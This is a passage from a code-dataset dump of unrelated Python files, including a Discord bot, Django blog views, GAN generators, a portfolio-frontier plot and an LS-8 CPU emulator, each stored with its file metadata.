ctx.send(f':ping_pong: **Pong!**\\n My current ping is: {client.latency * 1000}ms!')\r\n\t\r\n@client.command()\r\nasync def setup(ctx):\r\n\tawait ctx.send(f'OK, creating the roles & etc... !')\r\n\r\n@client.command()\r\nasync def showlogs(ctx):\r\n\tawait ctx.send(f'What logs you want to see:\\n-``Join``\\n-``Leave``')\r\nasync def getAnswer(message,allowed):\r\n try:\r\n def pred(m):\r\n return m.author == message.author and m.channel == message.channel\r\n msg = await BOT.wait_for('message', check=pred, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n return False\r\n else:\r\n\r\n if msg.content.lower().strip() in allowed:\r\n\r\n\r\n return msg\r\n else:\r\n\r\n return await getAnswer(message,allowed)\r\n\r\n@tasks.loop(seconds=10)\r\nasync def change_status():\r\n\tawait client.change_presence(activity=discord.Game(next(status)))\r\n\r\nclient.run(token)\r\n\r\n","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"225499919","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. 
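Bot.py above embeds its Discord token as a string literal, so the secret lives in source control; the usual alternative is to read it from the environment at startup. A sketch in the record's discord.py 1.x style (the variable name DISCORD_TOKEN is illustrative):

import os
from discord.ext import commands

client = commands.Bot(command_prefix="-")

token = os.environ.get("DISCORD_TOKEN")
if token is None:
    raise SystemExit("Set DISCORD_TOKEN before starting the bot")
client.run(token)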
and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom classy_vision.generic.opts import check_generic_args, parse_train_arguments\nfrom classy_vision.generic.util import load_json\n\n\ntry:\n import hydra\n\n hydra_available = True\nexcept ImportError:\n hydra_available = False\n\nargs = None\nconfig = None\n\n\nif hydra_available:\n\n @hydra.main(config_path=\"../hydra/args.yaml\")\n def _parse_hydra_args(cfg):\n # This need to be a separate function which sets globals because hydra doesn't\n # support returning from its main function\n global args, config\n args = cfg\n check_generic_args(args)\n config = args.config.to_container()\n\n\ndef parse_args():\n \"\"\"Parse arguments.\n\n Parses the args from argparse. If hydra is installed, uses hydra based args\n (experimental).\n \"\"\"\n if hydra_available:\n global args, config\n _parse_hydra_args()\n return args, config\n else:\n args = parse_train_arguments()\n config = load_json(args.config_file)\n return args, config\n","sub_path":"classy_vision/generic/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"47818943","text":"import urllib.request\nimport json\n\ndef getStockData(symbol):\n apiKey = \"N2IG8Q9WK1JZZ7U9\"\n url = \"https://www.alphavantage.co/query?function=GLOBAL_QUOTE&symbol={0}&apikey={1}\".format(symbol, apiKey)\n connection = urllib.request.urlopen(url)\n responseString = connection.read().decode()\n data = json.loads(responseString)\n print(data['Global Quote']['05. price'])\n return data['Global Quote']['05. price']\n\ndef __main__():\n fileContents = []\n while (True):\n answer = input(\"Enter a stock symbol or enter quit to quit:\\n\")\n if (answer.lower() == \"quit\"):\n break\n fileContents.append(\"The current price of \" + answer + \" is: \" + getStockData(answer))\n for contentLine in fileContents:\n f = open(\"japi.out\", \"a\")\n f.write(contentLine + \"\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n __main__();\n","sub_path":"japi.py","file_name":"japi.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"447139141","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nexp_data = np.random.exponential(1, 1000000)\nsum_n = 0\nsum_n_2 = 0\npat_nums = []\npat_times = []\nlast_n = 0\nn = 0\nwhile n < 100000:\n sum_n = sum_n + exp_data[n]\n if sum_n >= 100:\n pat_nums.append(n-last_n)\n last_n = n\n sum_n = 0\n\n sum_n_2 = sum_n_2+exp_data[n]\n if n % 10 == 0:\n pat_times.append(sum_n_2)\n sum_n_2 = 0\n\n n += 1\n#print(\"Pat num:\", pat_nums)\n#print(\"Pat time:\", pat_times)\n\nplt.hist(pat_nums, bins=\"auto\", normed=True, label=\"Pat numbers\")\nplt.hist(pat_times, bins=\"auto\", normed=True, label=\"Pat times\")\nplt.xlabel(\"Occurance within 100 timesteps\")\nplt.ylabel(\"Probability\")\nplt.legend()\n\n\nplt.show()\n","sub_path":"Multi-hospital/test_exp.py","file_name":"test_exp.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"553183393","text":"from django.views.generic import UpdateView, DetailView, ListView, CreateView, DeleteView\nfrom django.http import request, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom . 
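test_exp.py histograms event counts over fixed windows of a process with Exp(1) inter-arrival times; the textbook cross-check is that counts per window of length T then follow Poisson(T), so mean and variance should both land near T. A sketch:

import numpy as np

rng = np.random.default_rng(0)
arrivals = np.cumsum(rng.exponential(1.0, 1_000_000))   # event times
T = 100.0
counts, _ = np.histogram(arrivals, bins=np.arange(0.0, arrivals[-1], T))
print(counts.mean(), counts.var())   # both close to T = 100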
models import Contact, District, Feedback, Post,Comment\nfrom django.contrib import messages\nfrom . forms import ContactForm, CreatePostForm\nfrom django.urls import reverse_lazy\nfrom django.db.models import Q\nfrom .templatetags import tag\n\n# Create your views here.\n\n\ndef search(request):\n query = request.POST.get('search', ' ')\n if query:\n queryset = (Q(title__icontains=query)) | (Q(category__icontains=query)) | (Q(subject__icontains=query)) | (\n Q(class_in__name__icontains=query)) | (Q(salary__icontains=query))\n results = Post.objects.filter(queryset).distinct()\n else:\n results = []\n context = {\n 'results': results\n }\n return render(request, 'blog/search.html', context)\n\n\ndef home(request):\n return render(request, 'blog/home.html')\n\ndef about_us(request):\n return render(request, 'blog/about_us.html')\n\n\ndef feedback(request):\n if request.method == \"POST\":\n name = request.POST['name']\n phone = request.POST['phone']\n email = request.POST['email']\n complain = request.POST['complain']\n obj = Feedback(name=name, phone=phone, email=email, complain=complain)\n obj.save()\n messages.success(request, 'Feedback submit successfully.')\n return redirect('/')\n return render(request, 'blog/feedback.html')\n\n\ndef contact(request):\n if request.method == \"POST\":\n form = ContactForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Contact request submit successfully.')\n return redirect('/')\n\n else:\n form = ContactForm()\n return render(request, 'blog/contact.html', {'form': form})\n\n\n# class PostCreateView(CreateView):\n# model = Post\n# form_class = CreatePostForm\n# template_name = 'blog/createpost.html'\n# # success_url = '/'\n\n# def form_valid(self, form):\n# form.instance.user = self.request.user\n# messages.success(self.request, 'Post created successfully.')\n# return super().form_valid(form)\n\n# def get_success_url(self):\n# id = self.object.id\n# return reverse_lazy('postlist')\n\n\ndef createpost(request):\n if request.method == \"POST\":\n form = CreatePostForm(request.POST,request.FILES)\n if form.is_valid():\n obj=form.save(commit=False)\n obj.user=request.user\n obj.save()\n dis=form.cleaned_data['district']\n if not District.objects.filter(name=dis).exists():\n disobj=District(name=dis)\n disobj.save()\n class_in=form.cleaned_data['class_in']\n for i in class_in:\n obj.class_in.add(i)\n obj.save()\n messages.success(request, 'Post create successfully.')\n return redirect('postlist')\n else:\n form=CreatePostForm(district_set=District.objects.all().order_by('name'))\n return render(request, 'blog/createpost.html', {'form': form})\n\n\nclass PostListView(ListView):\n queryset = Post.objects.all()\n template_name = 'blog/postview.html'\n context_object_name = 'post'\n\n\n# def postlist(request):\n# post = Post.objects.all()\n# return render(request,'blog/postview.html',{'post':post})\n\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'blog/postdetail.html'\n def get_context_data(self,*args, **kwargs):\n self.object.views.add(self.request.user)\n\n liked=False\n if self.object.likes.filter(id=self.request.user.id).exists():\n liked=True\n context= super().get_context_data(*args,**kwargs)\n post=context.get('object')\n comments = Comment.objects.filter(post=post.id, parent=None)\n replies = Comment.objects.filter(post=post.id).exclude(parent=None)\n DictofReply={}\n for reply in replies:\n if reply.parent.id not in DictofReply.keys():\n DictofReply[reply.parent.id]=[reply]\n else:\n 
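search() above ORs five Q objects and de-duplicates with distinct(); the same filter reads more directly as one composed expression. A sketch that assumes the record's Post model inside a configured Django project (view-layer code, not standalone):

from django.db.models import Q

def search_posts(query):
    if not query:
        return Post.objects.none()
    return Post.objects.filter(
        Q(title__icontains=query)
        | Q(category__icontains=query)
        | Q(subject__icontains=query)
        | Q(class_in__name__icontains=query)
        | Q(salary__icontains=query)
    ).distinct()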
DictofReply[reply.parent.id].append(reply)\n context['liked']= liked\n context['comments'] = comments\n context['DictofReply'] = DictofReply\n return context\n\nfrom notifications.signals import notify\ndef likepost(request,id):\n if request.method==\"POST\":\n post=Post.objects.get(id=id)\n if post.likes.filter(id=request.user.id).exists():\n post.likes.remove(request.user)\n else:\n post.likes.add(request.user)\n if request.user != post.user:\n notify.send(request.user, recipient=post.user, verb=\"has liked your post\" + f''' Go ''')\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\ndef notification(request):\n return render(request, 'userprofile/notification.html')\n\n\ndef addcomment(request):\n if request.method==\"POST\":\n comment=request.POST['comment']\n parentid = request.POST['parentid']\n postid = request.POST['postid']\n post=Post.objects.get(id=postid)\n if parentid:\n parent=Comment.objects.get(id=parentid)\n newcom=Comment(text=comment,user=request.user,post=post,parent=parent)\n newcom.save()\n else:\n newcom = Comment(text=comment, user=request.user,post=post)\n newcom.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\ndef deletecomment(request,id):\n comment=Comment.objects.get(id=id)\n comment.delete()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\nclass PostEditView(UpdateView):\n model = Post\n form_class = CreatePostForm\n template_name = 'blog/createpost.html'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n messages.success(self.request, 'Post Edited Successfully')\n return super().form_valid(form)\n\n def get_success_url(self):\n id = self.object.id\n return reverse_lazy('postdetail', kwargs={'pk': id})\n\n\nclass PostDeleteView(DeleteView):\n model = Post\n template_name = 'blog/postdelete.html'\n\n def get_success_url(self):\n id = self.object.id\n messages.success(self.request, 'Deleted successfully')\n return reverse_lazy('postlist')\n","sub_path":"blog_website/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"490561746","text":"# Create a function that takes a list as a parameter,\n# and returns a new list with every odd number from the orignal list\n# example: [1, 2, 3, 4, 5] should produce [1, 3, 5]\n\n# print(odd_filter([1, 2, 3, 4, 5])) # should print [1, 3, 5]\n\nlist_of_number = [1, 2, 3, 6, 8, 9, 11]\nodd_number = []\n\ndef odd_filter():\n number = 0 \n for i in list_of_number:\n if not i % 2 == 0:\n odd_number.append(i)\n i += 1\n print(odd_number)\n\nodd_filter() \n\n# L = [1, 2, 3, 4, 5, 6, 7]\n# li = []\n# count = 0\n# for i in L:\n# if count % 2 == 1:\n# li.append(i)\n# count += 1 \n# print(li)","sub_path":"oddfilter/odd_filter.py","file_name":"odd_filter.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163107839","text":"import os, time, sys\nimport matplotlib.pyplot as plt\nimport itertools\nimport pickle\nimport imageio\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader \nimport torch.nn as nn\n\n\n##### DCGAN\ndef normal_init(m, mean, std):\n if isinstance(m, nn.ConvTranspose2d) or isinstance(m, nn.Conv2d):\n 
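PostDetailView above builds its parent-to-replies mapping with a hand-rolled dict check; collections.defaultdict removes the branch. A sketch with (id, parent_id, text) tuples standing in for the ORM Comment objects:

from collections import defaultdict

comments = [(1, None, "nice post"), (2, 1, "agreed"),
            (3, 1, "same here"), (4, None, "thanks")]

replies = defaultdict(list)
for cid, parent, text in comments:
    if parent is not None:
        replies[parent].append((cid, text))

print(dict(replies))   # {1: [(2, 'agreed'), (3, 'same here')]}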
m.weight.data.normal_(mean, std)\n m.bias.data.zero_()\n# G(z)\nclass DCGANgenerator(nn.Module):\n # initializers\n def __init__(self, d=128,channel=1):\n super(DCGANgenerator, self).__init__()\n self.deconv1 = nn.ConvTranspose2d(100, d*8, 4, 1, 0)\n self.deconv1_bn = nn.BatchNorm2d(d*8)\n self.deconv2 = nn.ConvTranspose2d(d*8, d*4, 4, 2, 1)\n self.deconv2_bn = nn.BatchNorm2d(d*4)\n self.deconv3 = nn.ConvTranspose2d(d*4, d*2, 4, 2, 1)\n self.deconv3_bn = nn.BatchNorm2d(d*2)\n self.deconv4 = nn.ConvTranspose2d(d*2, d, 4, 2, 1)\n self.deconv4_bn = nn.BatchNorm2d(d)\n self.deconv5 = nn.ConvTranspose2d(d, channel, 4, 2, 1)\n\n # weight_init\n def weight_init(self, mean, std):\n for m in self._modules:\n normal_init(self._modules[m], mean, std)\n\n # forward method\n def forward(self, input):\n # x = F.relu(self.deconv1(input))\n x = F.relu(self.deconv1_bn(self.deconv1(input)))\n x = F.relu(self.deconv2_bn(self.deconv2(x)))\n x = F.relu(self.deconv3_bn(self.deconv3(x)))\n x = F.relu(self.deconv4_bn(self.deconv4(x)))\n x = F.tanh(self.deconv5(x))\n\n return x\n\n\n### channel adjustable DCGAN, multi-gpu\nclass adDCGANGenerator(nn.Module):\n def __init__(self, ngpu,nz,nc,ngf):\n super(adDCGANGenerator, self).__init__()\n self.ngpu = ngpu\n self.nz = nz\n self.nc = nc\n self.ngf = ngf\n self.main = nn.Sequential(\n # input is Z, going into a convolution\n nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(True),\n # state size. (ngf*8) x 4 x 4\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n # state size. (ngf*4) x 8 x 8\n nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # state size. (ngf*2) x 16 x 16\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n # state size. (ngf) x 32 x 32\n nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. 
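DCGAN takes its latent input as a (batch, nz, 1, 1) tensor, and the five transposed convolutions above upsample it 1 -> 4 -> 8 -> 16 -> 32 -> 64. A sketch of exercising the class, assuming DCGANgenerator from this record is in scope:

import torch

G = DCGANgenerator(d=128, channel=1)
G.weight_init(mean=0.0, std=0.02)    # DCGAN-paper initialisation

z = torch.randn(4, 100, 1, 1)        # batch of 4 latent vectors
with torch.no_grad():
    fake = G(z)
print(fake.shape)                     # torch.Size([4, 1, 64, 64])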
(nc) x 64 x 64\n )\n\n def forward(self, input):\n if input.is_cuda and self.ngpu > 1:\n output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))\n else:\n output = self.main(input)\n return output\n\n\n\n\n\n###### another DCGAN\nclass DCGANGenerator(nn.Module):\n def __init__(self, input_size, image_channels=1, height=32, length=32, hidden_size=64, blocks=4):\n super(DCGANGenerator, self).__init__()\n self.hidden_size = hidden_size\n self.blocks = blocks\n self.height = height\n self.length = length\n self.mult = 2**blocks\n\n self.initial_linear = nn.Linear(input_size, hidden_size * self.mult * height//self.mult * length//self.mult)\n self.initial_activ = nn.PReLU(hidden_size * self.mult * height//self.mult * length//self.mult)\n self.initial_norm = nn.LayerNorm(hidden_size * self.mult * height//self.mult * length//self.mult)\n\n self.convs = nn.ModuleList([nn.Conv2d(hidden_size * 2 **(blocks - i), hidden_size * 2**(blocks - i - 1), (5, 5), padding=(2, 2)) for i in range(blocks)])\n self.activ = nn.ModuleList([nn.PReLU(hidden_size * 2**(blocks - i - 1)) for i in range(blocks)])\n self.norm = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i - 1), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n\n self.final_conv = nn.Conv2d(hidden_size, image_channels, (5, 5), padding=(2, 2))\n self.final_activ = nn.Tanh()\n\n def forward(self, inputs):\n x = self.initial_linear(inputs)\n x = self.initial_activ(x)\n x = self.initial_norm(x)\n x = x.view(x.shape[0], self.hidden_size * self.mult, self.height//self.mult, self.length//self.mult)\n\n for i in range(self.blocks):\n x = self.convs[i](x)\n x = self.activ[i](x)\n x = self.norm[i](x)\n x = F.upsample(x, scale_factor=2)\n x = self.final_conv(x)\n x = self.final_activ(x)\n return x\n\n\n\n\n##### WGAN-GP\nclass ResNetGenerator(nn.Module):\n def __init__(self, input_size, image_channels=1, height=32, length=32, hidden_size=64, blocks=4):\n super(ResNetGenerator, self).__init__()\n self.hidden_size = hidden_size\n self.blocks = blocks\n self.height = height\n self.length = length\n self.mult = 2**blocks\n\n self.initial_linear = nn.Linear(input_size, hidden_size * self.mult * height//self.mult * length//self.mult)\n self.initial_norm = nn.LayerNorm(hidden_size * self.mult * height//self.mult * length//self.mult)\n self.initial_activ = nn.PReLU(hidden_size * self.mult * height//self.mult * length//self.mult)\n\n self.convs1 = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i\n in range(blocks)])\n self.norm1 = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.activ1 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])\n\n self.convs2 = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i\n in range(blocks)])\n self.norm2 = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.activ2 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])\n\n self.convs3 = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i\n in range(blocks)])\n self.norm3 = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** 
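DCGANGenerator above doubles spatial size with F.upsample, which newer PyTorch releases deprecate in favour of F.interpolate; the two are equivalent for this nearest-neighbour, scale-factor-2 use. A sketch:

import torch
import torch.nn.functional as F

x = torch.randn(1, 8, 16, 16)
y = F.interpolate(x, scale_factor=2, mode="nearest")
print(y.shape)   # torch.Size([1, 8, 32, 32])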
(blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.activ3 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])\n\n self.convs4 = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i\n in range(blocks)])\n self.norm4 = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.activ4 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])\n\n self.transitions_conv = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i - 1), (3, 3), padding=(1, 1)) for\n i in range(blocks)])\n self.transitions_norm = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i - 1), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.transitions_activ = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i - 1)) for i in range(blocks)])\n\n self.final_conv = nn.Conv2d(hidden_size, image_channels, (5, 5), padding=(2, 2))\n self.final_activ = nn.Tanh()\n\n def forward(self, inputs):\n x = self.initial_linear(inputs)\n x = self.initial_activ(x)\n x = self.initial_norm(x)\n\n x = x.view(x.shape[0], self.hidden_size * self.mult, self.height//self.mult, self.length//self.mult)\n\n for i in range(self.blocks):\n fx = self.convs1[i](x)\n fx = self.activ1[i](fx)\n fx = self.norm1[i](fx)\n fx = self.convs2[i](fx)\n fx = self.activ2[i](fx)\n fx = self.norm2[i](fx)\n\n x = x + fx\n\n fx = self.convs3[i](x)\n fx = self.activ3[i](fx)\n fx = self.norm3[i](fx)\n fx = self.convs4[i](fx)\n fx = self.activ4[i](fx)\n fx = self.norm4[i](fx)\n\n x = x + fx\n\n x = self.transitions_conv[i](x)\n x = self.transitions_activ[i](x)\n x = self.transitions_norm[i](x)\n x = F.upsample(x, scale_factor=2)\n\n x = self.final_conv(x)\n x = self.final_activ(x)\n\n return x\n","sub_path":"Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":9349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556032019","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 15 16:57:42 2015\n\n@author: he math\n\"\"\"\nfrom sympy import symbols,sqrt,simplify,lambdify \nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef portfolioplot( muf=0.06,mu1=0.14,mu2=0.08,sig1=0.2,sig2=0.15,rho12=0,figsize=None):\n #the first risk asset has higher returns and risk in this function\n w=symbols(\"w\")\n ExpRet=mu2+(mu1-mu2)*w\n Varf=simplify(sig1**2*w**2+sig2**2*(1-w)**2+2*w*(1-w)*rho12*sig1*sig2)\n StdRet=sqrt(Varf)\n #init_printing()\n ExpRet,simplify(StdRet)\n \n meanf= lambdify(w, ExpRet, \"numpy\")\n varf=lambdify(w,Varf,\"numpy\") \n\n #%matplotlib inline\n if figsize is None:\n plt.figure(figsize=(12,8))\n else:\n plt.figure(figsize=figsize)\n \n plt.text(sig1,mu1*1.02,\"$R_1$\")\n plt.text(sig2,mu2*0.95,\"$R_2$\")\n \n wmin=float(-Varf.coeff(w,1)/(2*Varf.coeff(w,2)))\n mx=sqrt(varf(wmin));my=meanf(wmin)\n plt.plot([sig1,sig2,0,mx],[mu1,mu2,muf,my],\"bo\")\n plt.text(mx*1.02,my,\"M (minimum variance portfolio)\",fontsize=15)\n plt.text(0,muf*1.1,\"F\",fontsize=15)\n \n wv=np.linspace(0,wmin,100)\n stdv=np.sqrt(varf(wv))\n meanv=meanf(wv)\n plt.plot(stdv,meanv,\"r-\") \n plt.annotate(\"$w\\in$\"+str([0,round(wmin,3)]), size=15,xy=(stdv[30],meanv[30]),\n xytext=(stdv[30]*1.1,meanv[30]),\n 
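ResNetGenerator above repeats one motif per block: two convolutions whose output is added back onto the input before the upsampling transition. That residual motif in isolation (a simplified sketch, with ReLU in place of the record's PReLU/LayerNorm pairing):

import torch
import torch.nn as nn
import torch.nn.functional as F

class ResBlock(nn.Module):
    def __init__(self, ch):
        super().__init__()
        self.c1 = nn.Conv2d(ch, ch, 3, padding=1)
        self.c2 = nn.Conv2d(ch, ch, 3, padding=1)

    def forward(self, x):
        fx = F.relu(self.c1(x))
        fx = self.c2(fx)
        return x + fx                 # the residual connection

print(ResBlock(16)(torch.randn(1, 16, 8, 8)).shape)   # unchanged: [1, 16, 8, 8]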
arrowprops=dict(facecolor=\"red\"))\n    \n    \n    wv=np.linspace(wmin,1,100)\n    stdv=np.sqrt(varf(wv))\n    meanv=meanf(wv)\n    plt.plot(stdv,meanv,\"b-\") \n    plt.annotate(\"efficient frontier\\n\"+\"$w\\in$\"+str([round(wmin,3),1]), size=15,xy=(stdv[80],meanv[80]),\n             xytext=(stdv[80]*0.6,meanv[80]),\n            arrowprops=dict(facecolor=\"blue\"))\n    \n    plt.xlim([-0.01,max(sig1,sig2)*1.1])\n    plt.ylim([max(0,muf-0.02)*0.9,max(mu1,mu2)*1.1])\n    plt.plot([0,mx],[muf,my],\"b--\")\n    plt.plot([0,sig2],[muf,mu2],\"r-.\")\n    \n    # tangency portfolio\n    v1=mu1-muf;v2=mu2-muf;\n    Wt=(v1*sig2**2-v2*rho12*sig1*sig2)/(v1*sig2**2+v2*sig1**2-(v1+v2)*rho12*sig1*sig2)\n    Tx=sqrt(varf(Wt));Ty=meanf(Wt)\n    plt.plot([Tx],[Ty],\"bo\")\n    plt.plot([Tx,0],[Ty,muf],\"b--\")\n    plt.text(Tx*1.01,Ty*0.93,\"T (tangency portfolio)\\n \"+\"$w=$\"+str(round(Wt,3)),fontsize=15)","sub_path":"DataAnalysisWithPython/scripts/efficentfronter.py","file_name":"efficentfronter.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"405617472","text":"\"\"\"Main point of entrance to the application\"\"\"\nimport sys\n\nfrom .core import session, utils\nfrom .core.settings_manager import get_global_settings\nfrom .cli import argument_parser, commands\n\n\ndef execute_from_command_line(testdir):\n    # deactivate .pyc extension file generation\n    sys.dont_write_bytecode = True\n    sys.path.insert(0, '')\n\n    if not utils.is_valid_test_directory(testdir):\n        sys.exit('Error: current directory is not an existing Golem test '\n                 'directory; .golem file not found')\n\n    # set global values\n    session.testdir = testdir\n    session.settings = get_global_settings()\n\n    parser = argument_parser.get_parser()\n    args = parser.parse_args()\n    commands.command_dispatcher(args)\n","sub_path":"golem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161489074","text":"from django.db import models\n\nclass Project(models.Model):\n    \"\"\"\n    individual projects that I have worked on\n    \"\"\"\n\n    title = models.CharField(max_length=50)\n    url = models.URLField(blank=True)\n    description = models.CharField(max_length=500)\n    image = models.ImageField(upload_to='projects/')\n    hidden = models.BooleanField(default=False)\n\n    # determine the order the projects should be shown\n    order = models.IntegerField(default=0)\n\n    # comma separated field\n    tags = models.CharField(max_length=200, blank=True)\n\n    class Meta:\n        ordering = ['order']\n\n    @property\n    def tag_list(self):\n        \"\"\"\n        return a list of the tags from self.tags\n        \"\"\"\n        return self.tags.split(',')\n\n    def __str__(self):\n        return self.title\n","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
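A quick sketch of how the Project.tag_list property above behaves; this is not part of the dataset and assumes an unsaved Project instance inside a configured Django project, with made-up tag data:

# Hypothetical usage of Project.tag_list; the tag string is invented data.
p = Project(title='Portfolio site', tags='python,django,web')
print(p.tag_list)  # ['python', 'django', 'web']
# Caveat: when tags is empty, ''.split(',') returns [''] rather than [].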
+{"seq_id":"422508036","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\nclass CPU:\n    \"\"\"Main CPU class.\"\"\"\n\n    def __init__(self, filename):\n        \"\"\"Construct a new CPU.\"\"\"\n        self.reg = [0] * 256\n        self.ram = [0] * 128\n        self.filename = filename\n        self.stack_pointer = 0xF4\n        self.flags = [0] * 8\n    def load(self):\n        \"\"\"Load a program into memory.\"\"\"\n\n        address = 0\n\n        with open(self.filename, 'r') as f:\n            program = f.read().splitlines()\n            program = ['0b'+line[:8] for line in program if line and line[0] in ['0', '1']]\n\n\n        for instruction in program:\n            self.ram[address] = eval(instruction)\n            address += 1\n\n        # print(self.ram)\n    def alu(self, op, reg_a, reg_b):\n        \"\"\"ALU operations.\"\"\"\n\n        if op == \"ADD\":\n            self.reg[reg_a] += self.reg[reg_b]\n        elif op == \"MUL\":\n            self.reg[reg_a] *= self.reg[reg_b]\n        elif op == \"CMP\":\n            self.flags = [0] * 8\n            if self.reg[reg_a] < self.reg[reg_b]:\n                self.flags[5] = 1\n            elif self.reg[reg_a] == self.reg[reg_b]:\n                self.flags[6] = 1\n            elif self.reg[reg_a] > self.reg[reg_b]:\n                self.flags[7] = 1\n        else:\n            raise Exception(\"Unsupported ALU operation\")\n\n    def trace(self):\n        \"\"\"\n        Handy function to print out the CPU state. You might want to call this\n        from run() if you need help debugging.\n        \"\"\"\n        print(\"RAM:\", self.ram)\n        print(\"REG:\", self.reg[:10])\n        print(\"STACK:\", self.reg[self.stack_pointer:0xF4])\n\n    def run(self):\n        \"\"\"Run the CPU.\"\"\"\n\n        address = 0\n        while True:\n            instruction = self.ram[address]\n            # LDI\n            if instruction == 0b10000010:\n                register = self.ram[address + 1]\n                integer = self.ram[address + 2]\n                address += 3\n                self.reg[register] = integer\n            # PRN\n            elif instruction == 0b01000111:\n                register = self.ram[address + 1]\n                address += 2\n                print(self.reg[register])\n            # ADD\n            elif instruction == 0b10100000:\n                self.alu(\"ADD\", self.ram[address + 1], self.ram[address + 2])\n                address += 3\n            # MUL\n            elif instruction == 0b10100010:\n                self.alu(\"MUL\", self.ram[address + 1], self.ram[address + 2])\n                address += 3\n            # PUSH\n            elif instruction == 0b01000101:\n                register = self.ram[address + 1]\n                self.stack_pointer -= 1\n                self.reg[self.stack_pointer] = self.reg[register]\n                address += 2\n            # POP\n            elif instruction == 0b01000110:\n                register = self.ram[address + 1]\n                self.reg[register] = self.reg[self.stack_pointer]\n                self.stack_pointer += 1\n                address += 2\n            # CALL\n            elif instruction == 0b01010000:\n                self.stack_pointer -= 1\n                self.reg[self.stack_pointer] = address 